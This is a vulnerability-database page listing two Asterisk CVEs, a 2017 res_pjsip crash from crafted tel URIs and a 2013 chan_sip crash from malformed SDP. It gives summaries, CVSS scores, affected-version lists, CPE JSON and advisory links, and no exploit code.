Vulnerability from fkie_nvd

Published

2017-09-02 16:29

Modified

2024-11-21 03:12

Severity ?

7.5 (High) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

In the pjsip channel driver (res_pjsip) in Asterisk 13.x before 13.17.1 and 14.x before 14.6.1, a carefully crafted tel URI in a From, To, or Contact header could cause Asterisk to crash.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2017-007.html	Patch, Vendor Advisory
cve@mitre.org	http://www.securityfocus.com/bid/100583	Third Party Advisory, VDB Entry
cve@mitre.org	http://www.securitytracker.com/id/1039253	Third Party Advisory, VDB Entry
cve@mitre.org	https://bugs.debian.org/873909	Issue Tracking, Patch, Third Party Advisory
cve@mitre.org	https://issues.asterisk.org/jira/browse/ASTERISK-27152	Issue Tracking, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2017-007.html	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/100583	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://www.securitytracker.com/id/1039253	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://bugs.debian.org/873909	Issue Tracking, Patch, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/jira/browse/ASTERISK-27152	Issue Tracking, Vendor Advisory

Impacted products

Vendor	Product	Version
digium	asterisk	13.0.0
digium	asterisk	13.0.0
digium	asterisk	13.0.0
digium	asterisk	13.0.0
digium	asterisk	13.0.1
digium	asterisk	13.0.2
digium	asterisk	13.1.0
digium	asterisk	13.1.0
digium	asterisk	13.1.0
digium	asterisk	13.1.1
digium	asterisk	13.2.0
digium	asterisk	13.2.0
digium	asterisk	13.2.1
digium	asterisk	13.3.0
digium	asterisk	13.3.2
digium	asterisk	13.4.0
digium	asterisk	13.4.0
digium	asterisk	13.5.0
digium	asterisk	13.5.0
digium	asterisk	13.6.0
digium	asterisk	13.7.0
digium	asterisk	13.7.0
digium	asterisk	13.7.1
digium	asterisk	13.7.2
digium	asterisk	13.8.0
digium	asterisk	13.8.0
digium	asterisk	13.8.1
digium	asterisk	13.8.2
digium	asterisk	13.9.0
digium	asterisk	13.9.1
digium	asterisk	13.10.0
digium	asterisk	13.10.0
digium	asterisk	13.11.0
digium	asterisk	13.11.1
digium	asterisk	13.11.2
digium	asterisk	13.12
digium	asterisk	13.12.0
digium	asterisk	13.12.1
digium	asterisk	13.12.2
digium	asterisk	13.13
digium	asterisk	13.13.0
digium	asterisk	13.13.1
digium	asterisk	13.14.0
digium	asterisk	13.14.0
digium	asterisk	13.14.0
digium	asterisk	13.14.1
digium	asterisk	13.15.0
digium	asterisk	13.15.0
digium	asterisk	13.15.0
digium	asterisk	13.15.0
digium	asterisk	13.15.1
digium	asterisk	13.16.0
digium	asterisk	13.16.0
digium	asterisk	13.16.0
digium	asterisk	13.17.0
digium	asterisk	13.17.0
digium	asterisk	14.0
digium	asterisk	14.0.0
digium	asterisk	14.0.0
digium	asterisk	14.0.0
digium	asterisk	14.0.0
digium	asterisk	14.0.0
digium	asterisk	14.0.1
digium	asterisk	14.0.2
digium	asterisk	14.1
digium	asterisk	14.01
digium	asterisk	14.1.0
digium	asterisk	14.1.1
digium	asterisk	14.1.2
digium	asterisk	14.02
digium	asterisk	14.2
digium	asterisk	14.2.0
digium	asterisk	14.2.1
digium	asterisk	14.3.0
digium	asterisk	14.3.0
digium	asterisk	14.3.0
digium	asterisk	14.3.1
digium	asterisk	14.4.0
digium	asterisk	14.4.0
digium	asterisk	14.4.0
digium	asterisk	14.4.0
digium	asterisk	14.4.1
digium	asterisk	14.5.0
digium	asterisk	14.5.0
digium	asterisk	14.5.0
digium	asterisk	14.6.0
digium	asterisk	14.6.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.0:*:*:*:lts:*:*:*",
              "matchCriteriaId": "E7D1238A-A8D2-485E-81FD-46038A883EC3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "E93A7967-9A04-424A-BDDB-A2B8289B9AC4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "8F75C9FF-6F95-4F6A-B683-FE2BEDE3AD10",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.0:beta3:*:*:*:*:*:*",
              "matchCriteriaId": "68226156-42ED-4F0E-93E1-02DD57E582B6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "FB2C4E1E-6B90-4DCC-BC09-7D19FBA65C3F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "A4EB385E-28B5-4259-9431-99E1F32D61B7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "58C0FF1B-6188-4181-A139-1806328762BD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "890EBB8C-989B-4344-AC03-62B399076008",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "BD4AAECB-A2BC-45BA-BC63-E51C1FE6C334",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "121EACD3-D5E3-4691-8024-95996865BB65",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "136D6508-660E-410D-829A-7DD452BF8819",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.2.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "AEC2B3AA-EB24-4259-BED1-5DBC102FE9C1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "74B23D17-7356-4D37-8C73-E87896D1335B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.3.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "CEA9DA4A-A3E6-4C46-9471-CCBFA71083AF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.3.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "81A8A6CB-D236-4AB3-8476-C2D34DB7EF31",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "599833A2-CBE9-479B-8A6E-AF79C5EED1DB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "B55719B3-7325-47E1-8D16-3F34B1F44385",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "B870B3B7-E8DC-45A2-8FA4-657D005D00E3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.5.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "C91E9A3B-54EB-4819-94DD-30F7D0C90047",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "47189DF9-8E57-4BA6-9F52-B7A8229AE02A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "84AAFA3C-3CCD-4615-9725-169C303CF18F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.7.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "C92E0801-9E8F-4CF2-A4A0-48BCF550F2D4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.7.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "5C1C39FA-EF1A-4F2B-87A0-A00BAE73C6A7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.7.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "677D1211-0B07-47B9-AB7A-E820E2B29561",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.8.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "84202BAF-29E1-472B-B11F-B73F6A8891CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "FFC7120D-E6A0-4801-A1CC-3E143896EE72",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.8.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "BAF2A83D-D9AE-441D-8D4E-335BF9D28A63",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.8.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "7F5C1479-A540-4B7D-B00C-BD35EEC83BB4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.9.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "AC12556C-5E82-47D7-87E5-FBDC01A920DD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.9.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "461C1D2D-C4C1-4FF8-8231-38A2505F3523",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.10.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "66595711-8573-4A9B-A8FE-4943E3097AA8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.10.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "5D1FE3D4-A0B9-475A-9B89-B0222283A6A9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.11.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "9670B5AC-CBD1-484C-90F8-69B1A60B6054",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.11.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "EE5794B6-246C-415E-8E20-56447F152488",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.11.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "E726CA39-A763-4422-B59E-E9E12518EA4D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "6A96EB57-835A-45B4-82F5-31F925A85629",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.12.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "206F1DC9-9E8F-4497-A354-4A14711993DC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.12.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "8D428364-E2AD-4BC6-9329-71793BC0EB61",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.12.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "08963910-E0BD-4487-B669-60E0BFA79863",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "86B16D04-3808-4380-8F64-0C36B185C1F2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.13.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "F3BD16A9-24BC-4FC1-81BA-A6D1FEF38D35",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.13.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "68BAAD53-DE75-41CA-BF60-C0363029D3A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.14.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "CDC383B3-27EF-4C37-94BE-F0D41B34CAFC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.14.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "A7824B34-06C3-403B-B6F3-C850D54438EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.14.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "17E86941-98F6-45A5-8646-6876F74D909F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.14.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C6DB27C0-C74E-4E6A-AA63-09CFE73C2EF6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.15.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "6C443A3B-DF96-4A68-B046-DE13689CA974",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.15.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "5F3AC9AE-288C-4F0E-BF15-C3F4AF09D8E0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.15.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "796A6021-9FCA-4354-A47C-7500C363C168",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.15.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "EBB9D073-195F-4C2A-932E-7F027710DB25",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.15.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "604E58C8-9B81-4992-8993-4A6CB876EE08",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.16.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "077C4CB8-1FDE-45D3-82E6-CE09A22809B1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.16.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3CDB96CA-5AAE-4B39-8E01-2E72E3B476AE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.16.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "8EB33EC3-CDE0-40BD-B269-512AE074D278",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.17.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "363FA95F-03EF-4D6A-A40D-76D285D16255",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:13.17.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "FA96DC31-4BAC-4C5A-923C-EBBFFC7ABB52",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "C949D5F5-6C0B-4B17-85B6-3A77D08CF967",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5D413741-BDB7-496D-A01B-75E2A98FDB5B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.0:beta1:*:*:*:*:*:*",
              "matchCriteriaId": "29130F7F-DE00-43E1-A4A6-8F1F95D5CB19",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.0:beta2:*:*:*:*:*:*",
              "matchCriteriaId": "25E94EC0-F577-4B2B-8B11-DC76278CDD42",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "101AD474-9B89-483D-84E8-08012677C55C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "D57E41F6-C2CF-4183-A78A-9531A88FB65D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "FB1F9BB8-F951-427E-B770-69C2ACEBDB28",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "7C4CE405-E923-4C9C-849A-D1031C4DB493",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "C039C0CE-9C9C-4D85-8D7C-574DCF9D920B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.01:*:*:*:*:*:*:*",
              "matchCriteriaId": "A1B2F2CC-18C3-46E7-8E7F-970622A710C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "04ECDFF1-9718-4FAE-B45B-4F8CCA82829E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "D2C4DA60-5701-4BD0-B2F9-D93B9E64111F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "0B12834D-2AF1-4AD1-AB23-859CAA5D3210",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.02:*:*:*:*:*:*:*",
              "matchCriteriaId": "89036D04-EA04-4041-9694-6768478D35F3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "B19070D3-9F03-43C7-9F31-9A54BD5F2441",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "E39BAA74-50A8-4087-8FF8-7C5922121319",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "6D29C253-B403-4B00-A626-3E3A920DC018",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.3.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "5E9D8FA2-21EA-4384-8001-118DA7C959F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.3.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "3368DE88-7009-46A0-93F4-4D52BAD3D173",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.3.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "26586127-B68B-4476-8182-C49B1B1DCDC6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.3.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "6D1EFDCC-983E-4227-9FD5-456C16610BC8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "DFA7DBAD-BCA6-47D1-A92E-4EB7941F55F1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "02C6C827-97A6-4287-8B3E-DE29054242B3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.4.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "9BE4F7C1-BB82-44BA-BBFD-9F660330EC15",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.4.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "E4FCA146-5A72-4746-BE23-63271FBC4D47",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "4A0C90BB-C3FE-4A75-B739-0236C4256F7E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "46BD9466-0BC9-4B4D-928F-240CD46D306C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.5.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "06F456AD-19D3-49EF-82B1-07370F6499AA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.5.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "24A9997E-D0DC-45B0-B4DB-308667FA820E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.6.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "26202E79-98E0-4533-B4AE-1ABB2477F5A1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:14.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "C3D7384F-DF1B-4ED7-B1D5-885B95774DDB",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "In the pjsip channel driver (res_pjsip) in Asterisk 13.x before 13.17.1 and 14.x before 14.6.1, a carefully crafted tel URI in a From, To, or Contact header could cause Asterisk to crash."
    },
    {
      "lang": "es",
      "value": "En el controlador de canal pjsip (res_pjsip) en Asterisk 13.x en versiones anteriores a la 13.17.1 y 14.x en versiones anteriores a la 14.6.1, una URI tel cuidadosamente manipulada en un encabezado From, To, o Contact podr\u00eda provocar el bloqueo de Asterisk."
    }
  ],
  "id": "CVE-2017-14098",
  "lastModified": "2024-11-21T03:12:08.270",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2017-09-02T16:29:00.240",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2017-007.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/100583"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securitytracker.com/id/1039253"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Issue Tracking",
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://bugs.debian.org/873909"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27152"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2017-007.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/100583"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securitytracker.com/id/1039253"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Issue Tracking",
        "Patch",
        "Third Party Advisory"
      ],
      "url": "https://bugs.debian.org/873909"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-27152"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-20"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2013-09-09 17:55

Modified

2024-11-21 01:57

Severity ?

Summary

The SIP channel driver (channels/chan_sip.c) in Asterisk Open Source 1.8.x before 1.8.23.1, 10.x before 10.12.3, and 11.x before 11.5.1; Certified Asterisk 1.8.15 before 1.8.15-cert3 and 11.2 before 11.2-cert2; and Asterisk Digiumphones 10.x-digiumphones before 10.12.3-digiumphones allows remote attackers to cause a denial of service (NULL pointer dereference, segmentation fault, and daemon crash) via an invalid SDP that defines a media description before the connection description in a SIP request.

References

URL	Tags
cve@mitre.org	http://archives.neohapsis.com/archives/bugtraq/2013-08/0174.html
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2013-005.html	Patch, Vendor Advisory
cve@mitre.org	http://osvdb.org/96690
cve@mitre.org	http://secunia.com/advisories/54534	Vendor Advisory
cve@mitre.org	http://secunia.com/advisories/54617
cve@mitre.org	http://www.debian.org/security/2013/dsa-2749
cve@mitre.org	http://www.mandriva.com/security/advisories?name=MDVSA-2013:223
cve@mitre.org	http://www.securityfocus.com/bid/62022
cve@mitre.org	http://www.securitytracker.com/id/1028957
cve@mitre.org	https://issues.asterisk.org/jira/browse/ASTERISK-22007
af854a3a-2127-422b-91ae-364da2661108	http://archives.neohapsis.com/archives/bugtraq/2013-08/0174.html
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2013-005.html	Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://osvdb.org/96690
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/54534	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/54617
af854a3a-2127-422b-91ae-364da2661108	http://www.debian.org/security/2013/dsa-2749
af854a3a-2127-422b-91ae-364da2661108	http://www.mandriva.com/security/advisories?name=MDVSA-2013:223
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/62022
af854a3a-2127-422b-91ae-364da2661108	http://www.securitytracker.com/id/1028957
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/jira/browse/ASTERISK-22007

Impacted products

Vendor	Product	Version
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.18.0
digium	asterisk	1.8.18.0
digium	asterisk	1.8.18.1
digium	asterisk	1.8.19.0
digium	asterisk	1.8.19.0
digium	asterisk	1.8.19.0
digium	asterisk	1.8.19.1
digium	asterisk	1.8.20.0
digium	asterisk	1.8.20.0
digium	asterisk	1.8.20.0
digium	asterisk	1.8.21.0
digium	asterisk	1.8.21.0
digium	asterisk	1.8.22.0
digium	asterisk	1.8.22.0
digium	asterisk	1.8.22.0
digium	asterisk	1.8.23.0
digium	asterisk	1.8.23.0
digium	asterisk	1.8.23.0
digium	asterisk	10.10.0
digium	asterisk	10.10.0
digium	asterisk	10.10.0
digium	asterisk	10.11.0
digium	asterisk	10.11.0
digium	asterisk	10.11.0
digium	asterisk	10.11.0
digium	asterisk	10.12.0
digium	asterisk	10.12.0
digium	asterisk	10.12.0
digium	asterisk	10.12.1
digium	asterisk	10.12.2
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.1
digium	asterisk	11.0.2
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.1
digium	asterisk	11.1.2
digium	asterisk	11.2.0
digium	asterisk	11.2.0
digium	asterisk	11.3.0
digium	asterisk	11.3.0
digium	asterisk	11.4.0
digium	asterisk	11.4.0
digium	asterisk	11.4.0
digium	asterisk	11.4.0
digium	asterisk	11.5.0
